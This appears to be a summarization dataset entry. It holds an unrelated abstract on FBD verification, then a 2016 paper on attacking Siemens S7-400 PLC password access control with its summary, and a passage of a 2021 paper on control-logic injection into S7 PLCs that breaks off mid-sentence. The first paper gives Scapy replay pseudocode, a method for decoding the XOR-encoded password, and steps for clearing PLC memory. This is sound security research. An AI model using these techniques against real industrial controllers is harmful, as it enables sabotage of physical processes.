The development of Programmable Logic Controllers (PLCs) in the last years has made it possible to apply them in ever more complex tasks. Many systems based on these controllers are safety-critical, the certification of which entails a great effort. Therefore, there is a big demand for tools for analyzing and verifying PLC applications. Among the PLC-specific languages proposed in the standard IEC 61131-3, FBD (Function Block Diagram) is a graphical one widely used in rail automation. In this paper, a process of verifying FBDs by the NuSMV model checker is described. It consists of three transformation steps: FBD → textFBD → tFBD → NuSMV. The novel step introduced here is the second one: it reduces the state space dramatically so that realistic application components can be verified. The process has been developed and tested in the area of rail automation, in particular interlocking systems. As a part of the interlocking software, a typical point logic has been used as a test case.
|
Summarize:
Keywords-PLC; SCADA; Industrial Control Systems; Access Control; Passwords;
I. INTRODUCTION
A Programmable Logic Controller (PLC) is an important component in an ICS system. It is a control device used to automate industrial processes by collecting input data from field devices such as sensors, processing it, and then sending commands to actuator devices such as motors. Being a pivotal device in ICS systems, PLCs are a preferred target for cyber security attacks. ICS-CERT, the repository for ICS-specific incidents, includes a large number of PLC-related issues. A quick search performed in November 2016 reveals that out of a total of 589 advisories, 89 directly target PLCs, and out of a total of 114 alerts, 17 involve PLCs. Another manifestation of the exposure of PLCs to cyber security attacks is the Stuxnet malware [1], which was designed to attack primarily the PLCs of the Iranian nuclear facility. PLC security issues range from simple DoS to sophisticated remote code execution vulnerabilities. Most PLC attacks are possible because attackers could access and compromise the PLC device. PLC access control can be implemented at different layers: network layer, physical access, firmware, etc. In this paper, we discuss the different access control models for PLCs, but we focus on the most commonly deployed access control mechanism, namely, password-based access control. Using recent PLC devices (2016) with updated firmware, we show how passwords are stored in PLC memory, how passwords can be intercepted on the network, how they can be cracked, etc. As a consequence of these vulnerabilities, we could carry out advanced attacks on an ICS system setup, such as replay, PLC memory corruption, etc.
II. PLC VULNERABILITIES
A PLC is a particular type of embedded device that is programmed to manage and control physical components (motors, valves, sensors, etc.) based on system inputs and requirements.
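The read-inputs, evaluate-logic, write-outputs behavior described here can be pictured as a simple scan cycle. The sketch below is purely illustrative; the signal names and the control rule (open a valve when a tank level drops below a threshold) are made up and not taken from any vendor's runtime:

```python
def scan_cycle(inputs):
    """One illustrative PLC scan: read inputs, evaluate the control logic,
    write outputs. `inputs` is a dict of sensor readings; both the keys and
    the thresholds below are hypothetical."""
    outputs = {}
    outputs["valve_open"] = inputs["tank_level"] < 50.0   # refill when low
    outputs["alarm"] = inputs["tank_level"] > 95.0        # overflow warning
    return outputs

print(scan_cycle({"tank_level": 42.0}))   # valve opens, no alarm
```

A real PLC repeats this cycle continuously with a fixed, predictable scan time, which is why predictable response times are a primary design concern.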
A PLC typically has three main components, namely, an embedded operating system, control system software, and analog and digital inputs/outputs. Hence, a PLC can be considered a special digital computer executing specific instructions that collect data from input devices (e.g. sensors), send commands to output devices (e.g. valves), and transmit data to a central operations center. PLCs are commonly found in supervisory control and data acquisition (SCADA) systems as field devices. Because they contain a programmable memory, PLCs allow a customizable control of physical components through a user-programmable interface. The ICS-CERT repository, dedicated to ICS-related security incidents, includes several reports involving PLC vulnerabilities and alerts. Most of the reports are relatively recent (2010 and later). The increase in ICS and PLC incidents coincides with the increasing interconnection of ICS and corporate networks, which became a necessity to improve efficiency, minimize costs, and maximize profits. This, however, exposes ICS systems, and PLCs in particular, to various types of exploitation. Most PLC vulnerabilities can be grouped into three categories, namely, network vulnerabilities, firmware vulnerabilities, and access control vulnerabilities. PLCs are increasingly required to be interconnected with corporate LANs, intranets, and the Internet. Due to their increasing connectivity, PLCs are expected to support mainstream network protocols. Such standard protocols (e.g. TCP, IP, ARP, etc.) facilitate interconnection, but bring their own vulnerabilities (e.g. spoofing, replay, MITM, etc.).
World Congress on Industrial Control Systems Security (WCICSS-2016) 978-1-908320-63/6/$31.00 2016 IEEE
However,
Table I
EXAMPLES OF PLC NETWORK VULNERABILITIES AS REPORTED IN ICS-CERT ADVISORIES

Advisory | Affected product | Vulnerability | Exploit
ICSA-11-223-01A | Siemens SIMATIC PLCs | Use of open communication protocol | Execute unauthorized commands
ICSA-15-246-02 | Schneider Modicon PLC Web Server | Remote file inclusion | Remote file execution
ICSA-12-283-01 | Siemens S7-1200 Web Application | Cross-site scripting | Run malicious JavaScript on engineering station browser
ICSA-15-274-01 | Omron PLCs | Clear-text transmission of sensitive information | Password sniffing
ICS-ALERT-15-224-02 | Schneider Electric Modicon M340 PLC Station | Local file inclusion | Directory traversal / file manipulation

the most common type of network vulnerabilities is related to ICS-specific network protocols such as Modbus, Profinet, DNP3, etc., which include lack of authentication and lack of integrity checking of data sent over the protocol. Table I lists a sample set of PLC network vulnerabilities as reported in the ICS-CERT repository. Firmware is the operating system of controller devices, in particular, PLCs. It consists of data and code bundled together with several features such as an OS kernel and file system. As any software, a firmware is prone to flaws and security vulnerabilities. Vulnerabilities include buffer overflow, improper input validation, flawed protocol implementation, etc. More importantly, firmware and patches must be certified by vendors to make sure that they will not break system functionalities. Unfortunately, a large number of PLC vendors use weak firmware update validation mechanisms allowing unauthenticated firmware updates [2]. Table II lists a sample set of PLC firmware vulnerabilities as reported in the ICS-CERT repository. A PLC is a sensitive component of ICS systems, and hence only authorized entities should be allowed to access it, and any such access should be appropriately authenticated.
The most common PLC access control vulnerabilities include poor authentication mechanisms, lack of integrity methods, flawed password protection, and flawed communication protocols. For example, PLC vendors use hidden or hard-coded usernames and passwords to fully control the device. Attackers set up a database of default usernames and passwords and can brute-force such devices. Once unauthorized access is obtained, an adversary can retrieve sensitive data, modify values, manipulate memory, gain privilege, change PLC logic, etc.
III. PLC ACCESS CONTROL
A. Physical access control
Proper deployment and access control of PLCs as well as other ICS controllers significantly mitigate security breaches from either internal or external adversaries. Access control vulnerabilities can be significantly reduced by implementing recommendations in established standards such as ANSI/ISA-99 [3]. It is a complete security life-cycle program that defines procedures for developing and deploying policy and technology solutions to implement secure ICS systems. ISA99 is based on two main concepts, namely, zones and conduits, whose goal is to separate various subsystems and components. Devices that share common security requirements have to be in the same logical or physical group, and the communication between them takes place through conduits. This way, network traffic confidentiality and integrity are protected, DoS attacks are prevented, and malware traffic is filtered. In addition, control system administration must restrict physical and logical access to ICS devices to only those authorized individuals expected to be in direct contact with system equipment.
B. Network access control
ICS network access control is typically implemented in layers. The first layer is network logical segmentation, achieved typically with security technologies such as firewalls and VPNs.
All controller devices, in particular PLCs, must be located behind firewalls and not connected directly to corporate or other networks. Most importantly, critical devices should not be exposed directly to the Internet. Remote access to all ICS devices should be through secure tunnels such as VPNs. It is important to note that the firewall and VPN technologies used in ICS systems are different from the mainstream firewalls and VPNs used in typical IT networks. Indeed, many vendors provide special appliances for securing ICS networks. For example, Siemens provides a special type of switch, namely, Scalance S, with firewall and VPN features to secure the communication from/to PLCs. Finally, even with full deployment, these technologies may not block all breaches due to weak or inadequate configurations and filtering rules.
C. Password access control
Password-based access control is by far the most commonly used type of access control. Most PLC devices have built-in password protection to prevent unauthorized access and tampering. For effective password access control, important requirements need to be satisfied. In particular, password protection:
- must be enabled whenever possible
- must be properly configured
Table II
EXAMPLES OF PLC FIRMWARE VULNERABILITIES AS REPORTED IN ICS-CERT ADVISORIES

Advisory | Affected product | Vulnerability | Exploit
ICSA-16-026-02 | Rockwell MicroLogix 1100 PLC | Stack-based buffer overflow | Remote execution of arbitrary code
ICSA-13-116-01 | Galil RIO-47100 PLC | Improper input validation (allowing repeated requests to be sent in a single session) | Denial of service
ICSA-14-086-01 | Schneider Modbus Serial Driver | Stack-based buffer overflow | Arbitrary code execution with user privilege
ICSA-12-271-02 | Optimalog Optima PLC | Improper handling of incomplete packets | Denial of service
ICSA-16-152-01 | Moxa UC 7408-LX-Plus Device | Non-recoverable firmware overwrite | Permanently harming the device

Figure 1. PLC Lab Setup

- must use a strong encoding scheme
- must not need high processing operations
- must not use hardcoded credentials
- must be frequently and periodically changed.
In addition, it is highly recommended to delete default accounts or change default passwords. Unfortunately, not all vendors comply with and enforce these principles; therefore, several password-related incidents are reported.
IV. SECURITY ANALYSIS OF PLC PASSWORD ACCESS CONTROL
To carry out a realistic security analysis of PLC access control, we selected a commonly used PLC model, namely, the Siemens S7-400, and set up a lab including a common ICS configuration (Fig. 1). Based on the S7-400 documentation, several test cases have been performed, which revealed three access control levels for the PLC, namely, no protection, write protection, and read/write protection. The first level of access control, which is the default level, does not provide any form of access control. Using this level, any entity (device, station, etc.) can access the PLC processes and data without restriction. Access is possible provided that the remote entity speaks a PLC-supported communication protocol (e.g. COTP, Modbus, Profinet). The second level, write protection, provides, as its name indicates, a write protection on PLC data and processes.
That is, any attempt to modify data or processes on the PLC (e.g. load a new program, clear data) is password authenticated. The third level, which is the most restrictive, is read/write protection. Using that level, any interaction, that is, a read from or write to the PLC, is password authenticated.
A. Password policy
The configuration software, namely, SIMATIC PCS7, accepts any 8-ASCII-character password. If the password is less than 8 characters long, PCS7 pads it with white spaces. To set a PLC password, a user has to change the protection level and set the password in the PCS7 hardware configuration tool before loading the changes to the PLC. In addition to being loaded to the PLC memory, the password is stored locally in the engineering station's local files. In a normal scenario, any command sent to the PLC (e.g. start, stop, clear memory) should be authorized by providing the password. However, since the password is stored locally in the engineering station, the PCS7 software will ask for the password only one time, after the new configuration is loaded to the PLC. In subsequent interactions, PCS7 will automatically include the password in the packet requests sent to the PLC.
B. PLC memory structure
As mentioned above, setting a password consists in changing the protection level, selecting a password and then loading the new configuration to the PLC memory. The latter is organized into labeled blocks. Each block holds a specific type of information (Fig. 2). Most PLC blocks are used to organize the PLC program into independent sections corresponding to individual tasks. A Function Block (FB) is a block that holds user-defined functions with memory to store associated data. A Function (FC) is used to keep frequently used routines in the PLC operations. A Data Block (DB) stores user data. An Organization Block (OB) is an interface between the operating system and the user program, used to determine the CPU behavior, for example, to define error handling.
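The space-padding behavior reported above can be mimicked in a few lines. This is an illustrative sketch of padding to 8 ASCII characters, not PCS7's actual code:

```python
def pad_password(pw: str) -> bytes:
    """Pad a password to exactly 8 ASCII characters with trailing spaces,
    as the configuration software reportedly does (illustrative sketch)."""
    if len(pw) > 8:
        raise ValueError("password longer than 8 characters")
    return pw.ljust(8).encode("ascii")

print(pad_password("abc"))   # b'abc     '
```

One security consequence of such fixed-width padding is that every stored or transmitted password field has the same length, so short passwords are not distinguishable by size alone, but the effective alphabet of the trailing bytes is known to an attacker.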
A System Function Block (SFB) and System Functions (SFC) hold low-level functions (libraries) that can be called by user programs, such as handling the clock and run-time meters. Therefore, information loaded to the PLC is divided into blocks as well. The password is communicated and stored in the System Data Block (SDB). The SDB itself is divided into sub-blocks with different roles. The sub-blocks numbered from 0000 to 0999 and from 2000 to 2002 hold data that is updated in each download process. The rest of the sub-blocks are divided into two sets: sub-blocks from 1000 to 1005 contain data, and sub-blocks from 1006 to 1011 contain configuration data. Loading a new program to the PLC leads to overwriting all sub-blocks of the SDB block, except the 0000 sub-block, which contains the password. If an adversary aims at updating the password, he needs to clear the 0000 block first with a dedicated command and then set a new password with another command.

Figure 2. S7-400 PLC memory structure

C. PLC password sniffing
In order to evaluate the security of the password-based access control, a first step is to sniff the network packets containing the password. Typical network sniffing software (e.g. Wireshark, tcpdump) is used to capture packets exchanged between the engineering station (PCS7) and the PLC during a password setting process.
Since password setting is achieved through a load configuration command sent to the PLC, the process is repeated several times with different passwords to collect a good number of samples. The captured traffic is first filtered to extract complete TCP streams. The streams are then compared using byte comparison tools (e.g. Burp Suite Comparator). These tools help find similarities and differences between TCP streams. This allowed us to identify the specific packets containing the password and the exact byte offset of the password location inside the packets. It turned out that the 8-character password is encoded in each packet. Hence, the configuration software in the engineering station uses an encoding scheme to encode the password before uploading it to the PLC. It is important to note that when the PLC is configured with the no-protection level, the packets sniffed during load configuration have the same size as with the other levels of protection (read protection and read/write protection). Hence, packets are padded with random bits in place of the password in the case of the no-protection level.
D. Reverse engineering the password encoding scheme
After locating the 8 bytes inside the network packets containing the password, the next step is to decode the bytes to retrieve the plain-text version of the password. The reverse engineering started by trying typical encoding schemes, namely, URL encoding, ASCII hex, Base64, and variants of XOR (single-byte, multiple-byte, rolling, etc.). However, none of these typical schemes retrieved the plain-text version of the password pre-set in our samples. Full-fledged cryptographic (DES, AES, RC4, etc.) as well as hashing (MD5, SHA512, etc.) functions were excluded from the investigation for three reasons. First, there is no key exchange stage involved before password communication¹.
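Locating the password bytes by stream comparison can be sketched as follows. The capture bytes here are fabricated for illustration; the real analysis worked on full TCP streams with tools such as Wireshark and Burp Comparator:

```python
def diff_offsets(stream_a: bytes, stream_b: bytes):
    """Return the byte offsets at which two equal-length captures differ.
    With two captures that differ only in the password, the differing
    offsets cluster at the password's location inside the packet."""
    return [i for i, (a, b) in enumerate(zip(stream_a, stream_b)) if a != b]

# Two fabricated captures: identical protocol bytes, with a different
# 8-byte "password" field starting at offset 6.
capture1 = b"\x32\x01\x00\x1d\x00\x08" + b"AAAAAAAA" + b"\x00\x00"
capture2 = b"\x32\x01\x00\x1d\x00\x08" + b"BBBBBBBB" + b"\x00\x00"
print(diff_offsets(capture1, capture2))   # [6, 7, 8, 9, 10, 11, 12, 13]
```

Repeating this over several capture pairs with known password changes pins down both the carrying packet and the exact offset, which is the prerequisite for the decoding step that follows.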
Second, if cryptographic or hashing functions were used, the encoded password bytes would be completely shuffled compared to the plain-text version, which is not the case here (the cipher text is encoded byte by byte). Third, cryptographic and hashing functions are too processing-intensive for PLCs.
¹This holds for cryptographic functions.

Figure 3. PLC Password Encoding

XOR is a very common encoding scheme that is suitable for resource-limited hardware devices. As mentioned above, the password encoding is not using a typical XOR (single-byte, multiple-byte, etc.). Taking into consideration the fact that the encoding is done byte by byte and the requirement of a lightweight encoding algorithm, we focused on trying customized XOR transformations. To this end, a representative list of (plain-text password, encoded-text password) pairs was sampled from the network. Then, using automated scripts to brute-force each byte, we could successfully reverse-engineer the XOR-based encoding scheme. A graphical representation of the nested XOR-based encoding scheme is shown in Fig. 3. It is important to note that the PLC is using two variants of the encoding scheme: one used to load a configuration to the PLC and the other used during the authentication process. The two variants differ by the static byte constant used: 0x55 and 0xAA.
V. PLC ACCESS CONTROL ATTACKS
As a consequence of compromising the password-based PLC access control, several concrete attacks can be carried out on the PLC, ranging from simple replay to unauthorized password update attacks.
A.
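The per-byte brute-force approach can be sketched generically. The paper's actual scheme is a nested XOR (Fig. 3) whose details are not reproduced here, so the sketch below assumes the simplest case, one unknown key byte per position, and uses a fabricated key and fabricated samples:

```python
def recover_xor_key(pairs):
    """Brute-force a per-position XOR key from (plaintext, ciphertext) pairs.
    Assumes byte i is encoded as plain[i] XOR key[i]; the real S7 scheme is
    a nested XOR variant, so this shows only the general approach."""
    length = len(pairs[0][0])
    key = []
    for i in range(length):
        for k in range(256):   # try every candidate key byte
            if all(p[i] ^ k == c[i] for p, c in pairs):
                key.append(k)
                break
        else:
            raise ValueError(f"no consistent key byte at position {i}")
    return bytes(key)

# Fabricated samples: a made-up key applied to two space-padded passwords.
secret = bytes([0x55, 0xAA, 0x55, 0xAA, 0x55, 0xAA, 0x55, 0xAA])
encode = lambda pw: bytes(b ^ k for b, k in zip(pw, secret))
pairs = [(b"abc     ", encode(b"abc     ")),
         (b"password", encode(b"password"))]
print(recover_xor_key(pairs))   # recovers the made-up key
```

Because each byte is attacked independently, the search space is 8 × 256 candidates rather than 256^8, which is why a handful of sniffed samples suffices.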
Replay attack
A replay attack on the PLC consists in recording a sequence of packets related to a certain legitimate command and then replaying it later without authorization. The attack consists of 3 steps: starting a given command (stop, start, load configuration, clear memory block, etc.), capturing the packets, and replaying the captured packets at a later time. The target PLC may or may not be password protected. To make sure the replayed packets are accepted by the TCP/IP kernel at the PLC, we resorted to writing a customized Python script using Scapy [4]. Scapy is a powerful packet manipulation program written in Python and hence can be easily used in Python scripts. It features a variety of packet manipulation capabilities including: sniffing and replaying packets in the network, network scanning, tracerouting, etc. However, the most useful Scapy features for our replay attack are the ability to rewrite the sequence and acknowledgement numbers and to match requests and replies. Algorithm 1 shows the core of the Python script using the Scapy features. The above Python program has been tested using two attack scenarios. In the first scenario, the replay attack was launched from the same host (IP address) used for the capture, that is, the engineering station with the configuration software. In the second scenario, the replay attack was launched from a different host on the same network, that is, the attacker machine with Kali. In each scenario, two types of commands were tried, namely, start and stop, which require password authentication. The replay attack was successful in both scenarios for both types of commands.
Algorithm 1 Replay a sequence of captured packets using Scapy
1:  function REPLAY(pcapFile, ethInterface, srcIP, srcPort)
2:    recvSeqNum ← 0
3:    SYN ← True
4:    for packet in rdpcap(pcapFile) do
5:      ip ← packet[IP]
6:      tcp ← packet[TCP]
7:      del ip.chksum                ▷ Clearing the checksums
8:      ip.src ← srcIP               ▷ Attacker's machine IP
9:      ip.sport ← srcPort           ▷ Attacker's machine port
10:     if tcp.flags == ACK or tcp.flags == RSTACK then
11:       tcp.ack ← recvSeqNum + 1
12:       if SYN or tcp.flags == RSTACK then
13:         sendp(packet, iface=ethInterface)
14:         SYN ← False
15:         continue
16:       end if
17:     end if
18:     rcv ← srp1(packet, iface=ethInterface)
19:     recvSeqNum ← rcv[TCP].seq
20:   end for
21: end function

Hence, an unknown attacker machine (without the appropriate configuration software) on the same network can turn the PLC ON or OFF by simply replaying a start or stop command without knowing the PLC password. This clearly might cause significant damage to a SCADA system.
1) Password stealing: As detailed in Section IV, packets between the engineering station and the PLC are sent in the clear, including the encoded passwords. Based on a representative set of samples, we could locate the password inside packets and reverse-engineer the password encoding scheme. This allowed us to retrieve the plain-text password from the network traffic between the engineering station and the PLC.
2) Unauthorized password setting and updating: In a legitimate scenario, the PLC password is set and updated from the configuration software in the engineering station. In the case of a password update, the old password should be supplied first. Due to the PLC access control vulnerability, an attacker can set and update the password by replaying malicious packets directly to the PLC. When a password is written on the PLC, the SDB (System Data Block) is overwritten. The load process first checks the SDB to see if it is clean or already has a configuration. If there is a configuration, the process checks whether a password is set or not.
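The reason the capture cannot simply be resent verbatim is that the PLC picks a fresh initial sequence number for every connection, so the attacker's acknowledgement numbers must track the live reply stream rather than the captured one. A toy model of that bookkeeping, with no real networking and entirely fabricated packet dicts, might look like:

```python
import random

def rewrite_acks(captured_packets, live_server_seqs):
    """Toy model of Algorithm 1's bookkeeping: each outgoing packet's ACK is
    recomputed from the sequence number of the PLC's most recent reply
    instead of the stale captured value. All data here is fabricated."""
    recv_seq = None
    replayed = []
    for pkt, live_seq in zip(captured_packets, live_server_seqs):
        pkt = dict(pkt)
        if recv_seq is not None:
            pkt["ack"] = recv_seq + 1    # track the live connection
        replayed.append(pkt)
        recv_seq = live_seq              # seq observed in the PLC's reply
    return replayed

captured = [{"flags": "SYN", "ack": 0}, {"flags": "ACK", "ack": 1001}]
live = [random.randint(1, 2**32 - 1), 0]   # PLC's fresh ISN differs per run
out = rewrite_acks(captured, live)
print(out[1]["ack"] == live[0] + 1)        # the ack follows the live ISN
```

In the real script, Scapy's `srp1` supplies the "reply" whose sequence number feeds the next iteration, exactly as lines 18-19 of Algorithm 1 show.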
Hence, there are two main cases: setting a configuration with a password for the first time, and updating an old configuration that already has a password. For the first case, setting a password for the first time requires recording a password-setting packet sequence used in an old session and then replaying it. Since the goal is mainly to set the password, only the packets in charge of overwriting block 0000 in the SDB, which contains the password, are kept (more details in Section IV-B). For the second case, the goal of the attack is to set a password while the PLC is already protected by an existing password. Using the same procedure as in the first case as-is did not work. After investigation, it turned out that block 0000 of the SDB holding the password cannot be overwritten by replaying packets. As a result, the PLC keeps sending a FIN packet whenever an attempt is made to overwrite the SDB. To overcome this problem, we resorted to a two-stage procedure where initially we clear the content of block 0000 and then we replay packets to overwrite only that block with a new password. Since there is no legal command to just clean block 0000, we looked for a sequence of packets to delete a different block, and we modified them to delete block 0000. With this two-stage procedure, the password is successfully updated by a different workstation without the configuration software and without knowing the old password.
3) Clear PLC memory: The first stage of the unauthorized password updating attack consists in clearing the 0000 block of the SDB without needing the password. This step can be generalized to clear other blocks. More importantly, in an extreme use case, all PLC memory blocks can be cleared.
With this vulnerability, an attacker can launch a DoS attack by clearing all PLC memory and turning the PLC into an unresponsive device.
VI. RELATED WORK
Very close to our work, in a BlackHat talk, Beresford demonstrated a number of vulnerabilities in the Siemens Simatic PCS7 software, including replay attacks, authentication bypass, fingerprinting, and remote exploitation using the Metasploit framework [5]. This paper deviates from Beresford's demonstrations since our attacks are more interactive and use the recent and more secure versions of the PCS7 software as well as the more up-to-date firmware of the Siemens S7-400 PLC. As a generalization of Beresford's attacks, Milinkovic and Lazic reviewed a set of commercial operating systems running on PLCs of major vendors, highlighting serious vulnerabilities, with some experiments of a few attacks conducted on a ControlLogix PLC [6]. Also close to our work, Sandaruwan et al. showed how to attack Siemens S7 PLCs by exploiting flaws in the ISO-TSAP (Transport Service Access Point) protocol used for data exchange between controllers and PLCs [7]. A significant body of work in the literature focuses on security solutions for ICS systems, which has yielded several countermeasures to reinforce the security of such systems. These can be classified into communication protocol improvements [8], [9], and firewalls, filtering methods, and DMZs [10], [6], [7]. However, unlike in typical IT systems, it is impractical and not cost-effective to embrace several layers of mitigations due to performance and availability considerations.
VII. CONCLUSION
PLCs are a preferred target for cyber security attacks. PLC security issues range from simple DoS to sophisticated remote code execution vulnerabilities. Most PLC attacks are possible because attackers could access and compromise the PLC device. In this paper, we carried out a security analysis of the most common PLC access control mechanism, namely, password-based access control.
Using recent PLC devices (2016) with updated firmware, we showed how passwords are stored in PLC memory, how passwords can be intercepted on the network, how they can be cracked, etc. As a consequence of these vulnerabilities, we could carry out advanced attacks on an ICS system setup, such as replay, PLC memory corruption, etc. Although mitigating such vulnerabilities is relatively easy by placing a security module (e.g. Scalance S) between the PLC and other devices, such an approach is not yet widely deployed for budget and practical considerations.
ACKNOWLEDGMENT
This research was supported by The National Science, Technology and Innovation Plan (NSTIP) grant, NSTIP 13-INF281-04, at King Fahd University of Petroleum and Minerals.
Summary:
A Programmable Logic Controller (PLC) is a very common industrial control system device used to control output devices based on data received (and processed) from input devices. Given the central role that PLCs play in deployed industrial control systems, they have been a preferred target of ICS attackers. A quick search in the ICS-CERT repository reveals that out of a total of 589 advisories, more than 80 target PLCs. The Stuxnet attack, considered the most famous reported incident on ICS, targeted mainly PLCs. Most of the reported PLC incidents are rooted in the fact that the PLC is being accessed in an unauthorized way. In this paper, we investigate the PLC access control problem. We discuss several access control models, but we focus mainly on the commonly adopted password-based access control. We show how such a password-based mechanism can be compromised in a realistic scenario, as well as list the attacks that can be derived as a consequence. This paper details a set of vulnerabilities targeting recent versions of PLCs (2016) which have not been reported in the literature.
|
Summarize:
Index Terms: Programmable Logic Controllers (PLCs), Control Injection Attack, Decompiler, Compiler, Ladder Diagram
I. INTRODUCTION
Industrial Control Systems (ICSs) are used to automate critical control processes such as production lines, electrical power grids, gas plants and others. They consist of Programmable Logic Controllers (PLCs) which are directly connected to the physical processes. They are equipped with control logic that defines how to monitor and control the behavior of the processes. Thus, their safety, durability, and predictable response times are the primary design concerns. PLCs are offered by several vendors such as Siemens, Allen-Bradley, Schneider, etc. Each vendor has its own proprietary firmware, programming, communication protocols and maintenance software. However, the basic hardware and software architecture is similar, meaning that all PLCs contain variables, and logic to control their inputs and outputs. The PLC code is written on an engineering station in the vendor's control logic language. The control logic is then compiled into an executable format, and downloaded to the PLC. Unfortunately, security features are largely absent in ICS components, or ignored/disabled because security is often at odds with operations. Therefore, thousands of PLCs are directly reachable from the internet. Although only one PLC may be reachable from outside, this exposed PLC is likely to be connected to internal networks, e.g. via PROFINET, with many more PLCs [1]. This is what is called the deep industrial network; therefore, attackers can leverage an exposed PLC to extend their access from the internet to the deep industrial network. Stuxnet [2] is perhaps the most well-known attack on ICSs. This malware used a Windows PC to target Siemens S7-300 PLCs that are specifically connected with variable frequency drives.
It infects the control logic of the PLCs to monitor the frequency of the attached motors, and only launches an attack if the frequency is within a certain normal range (i.e., between 807 Hz and 1,210 Hz). Other attacks on PLCs have been conducted in the last decade. Most of them aimed at modifying the control logic in its compiled version, e.g. MC7 bytecode for Siemens and RX630 bytecode for Schneider. In contrast, our attack manipulates the control logic program in its high-level format, precisely in its LAD format. We choose LAD over the other programming languages because LAD is a graphical language where each instruction is represented as a graphical symbol and the instructions are grouped into networks, which makes reading and understanding a control logic program in LAD format very easy even for non-experts. As part of our full attack-chain, we also focus on employing 1) a decompiler to obtain the LAD code from the machine bytecode stolen over the network, and 2) a compiler to recompile the infected LAD code into MC7 machine bytecode that the PLC can read. We evaluate the accuracy of our decompiler and compiler on 5 different control logic programs (chosen randomly). Finally, we performed our full attack on a real industrial example application based on S7-300 PLCs and TIA Portal software (see figure 1). Please note that compromising the ICS network is out of the scope of this work and can be achieved via typical attack vectors in the IT world such as an infected USB drive, a vulnerable web server, etc. Our attack scenario is network based, and can be successfully launched by any attacker with network access to the target PLC.
However, finding PLCs connected directly to the Internet is an easy task using search engines such as Shodan, Censys, etc.
IECON 2021 - 47th Annual Conference of the IEEE Industrial Electronics Society | 978-1-6654-3554-3/21/$31.00 2021 IEEE | DOI: 10.1109/IECON48115.2021.9589721
Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:12 UTC from IEEE Xplore. Restrictions apply.
Fig. 1: Example application of our control process
The rest of the paper is organized as follows. Section II discusses related work, while our experimental setup is presented in section III. We illustrate our attack scenario in section IV, evaluate our decompiler and compiler in section V, and conclude this paper in section VI.
II. RELATED WORK
In recent years, many vulnerabilities have aimed at modifying control logic source code, by exploiting the engineering station [3], or by leveraging an Ethernet design flaw and then using crafted packets to delete control logic programs [4], [5]. Other vulnerabilities modify the control logic at runtime, compromising firmware and authentication flaws, and triggering PLC fault states to overwrite the control logic [6], [7]. As real-scenario attacks that targeted ICSs, we can mention the ones that occurred in Ukraine [8], [9], and in Germany [10]. These attacks caused severe control disruptions in the target facilities and massive damage in the physical systems controlled by the attacked PLCs. In the following, we compare our approach to previously published efforts that focused on exploiting the control logic code of PLCs. In 2018, a Ladder Logic Bomb malware written in ladder logic or one of the compatible languages was introduced in [11]. Such malware is inserted by an attacker into existing control logic on PLCs. However, this scenario requires the adversary to be familiar beforehand with the programming language the PLC is programmed in, which is not a common case in a real scenario.
Another group of researchers presented a remote attack on the control logic of PLCs in [12]. They were able to infect the PLC and to hide the infection from the engineering software at the control center. They implemented their attack on Schneider Electric Modicon M221 PLCs and the vendor-supplied engineering software (SoMachine-Basic). In contrast to their work, our attack allows the attacker to modify the control logic program in its high-level format, at will. Furthermore, we use S7 PLCs provided by Siemens, which transfer the machine bytecode over S7 packets. At Black Hat USA 2015, Klick et al. [13] demonstrated injection of malware into the control logic of a Simatic S7-300 PLC, without disrupting the service. The modification process of their attack is also done at the machine bytecode level. In a follow-on work, Spenneberg et al. [14] presented a PLC worm. The worm spreads internally from one PLC to other target PLCs. During the infection phase, the worm scans the network for new targets (PLCs). The authors hid the infected code in an organization block (OB9999), which is then transferred from one PLC to another by their worm. Their attack manipulates the control logic of S7 PLCs successfully, but on the one hand it is written with constraints such as the maximum cycle time, and on the other hand it does not decompile the machine bytecode, which requires the attacker to have a TIA Portal installation on his machine. In 2021, in a former work, we presented a stealthy injection attack on the control logic of S7 PLCs [15]. Our attack introduced a malicious logic into a target PLC. As part of our attack scenario, we implemented an initial decompiler that takes the machine bytecode as an input and decompiles it into Statement List (STL) source code. The decompiler used in [15] was limited to only a few instructions, and utilized a small database consisting of 56 entries.
In this work, we develop our mapping database to 3802 entries covering 34 LAD instructions including inputs, outputs, function blocks, data blocks, organization blocks, timers, counters, etc. Moreover, our new approach allows an adversary to modify the control logic in its high-level code, i.e. LAD format, and recompiles the infected code back to machine code, using a compiler, before pushing it back to the target PLC.
Fig. 2: High-level overview of our proposed attack scenario
III. EXPERIMENTAL SET-UP
In this section, we describe the experimental set-up used to test the full-chain attack presented in this paper. As shown in figure 1 (please note that we also used this setup in experiments run in our earlier publications [15], [16], [20]), there are two aquariums filled with water that is pumped from one to the other until a certain level is reached, and then the pumping direction is inverted. The control process in this set-up runs cyclically as follows: PLC.1 (S7 315-2DP) reads the input signals coming from sensors 1, 2, 3 and 4. The two upper sensors (Num. 1, 3) installed on both aquariums report to PLC.1 when the aquariums are full, while the two lower sensors (Num. 2, 4) report to PLC.1 when the aquariums are empty. After that, PLC.1 sends the sensor readings to PLC.2 (S7 315-2 PN/DP) using an industrial Ethernet Communication Processor (IE-CP 343-1 Lean). Then PLC.2 powers the pumps on/off depending on the sensor readings received from PLC.1.
IV. ATTACK DESCRIPTION
In this paper, we present a full attack-chain on the control logic of an S7 PLC. We assume a realistic attack scenario where the TIA Portal software in the engineering station is not reachable for an attacker, thereby making our attack more challenging.
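For reference, the cyclic control process of the test bed in section III can be restated in pseudocode form. The function below is a hypothetical sketch of the pumping logic (the names, the direction flag, and the return convention are our own framing, not the PLCs' actual LAD code):

```python
# Hypothetical restatement of the test-bed control cycle (section III):
# four level sensors (full/empty per aquarium) drive two pumps, and the
# pumping direction is inverted once the destination aquarium is full.
# All names here are ours; the real logic runs as LAD code on PLC.2.

def pump_outputs(full_a, empty_a, full_b, empty_b, direction):
    """Return (pump_a_to_b, pump_b_to_a, new_direction) for one scan cycle."""
    if direction == "a_to_b" and full_b:      # destination B full: invert
        direction = "b_to_a"
    elif direction == "b_to_a" and full_a:    # destination A full: invert
        direction = "a_to_b"
    # never pump from an empty source aquarium
    pump_a_to_b = direction == "a_to_b" and not empty_a
    pump_b_to_a = direction == "b_to_a" and not empty_b
    return pump_a_to_b, pump_b_to_a, direction
```

This also makes concrete what the later attack phases target: flipping a single output entry in this logic is enough to keep a pump running past a "full" signal.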
After the attacker has penetrated the system network and can send/receive messages to/from a target PLC, he launches our MITM system presented in [15] between the engineering station (TIA Portal software) and the field side (S7 PLCs), so that he is able to listen to and record all the network traffic exchanged between the stations using the Wireshark software. Figure 2 shows a high-level overview of our proposed control injection attack. It consists of six main phases:
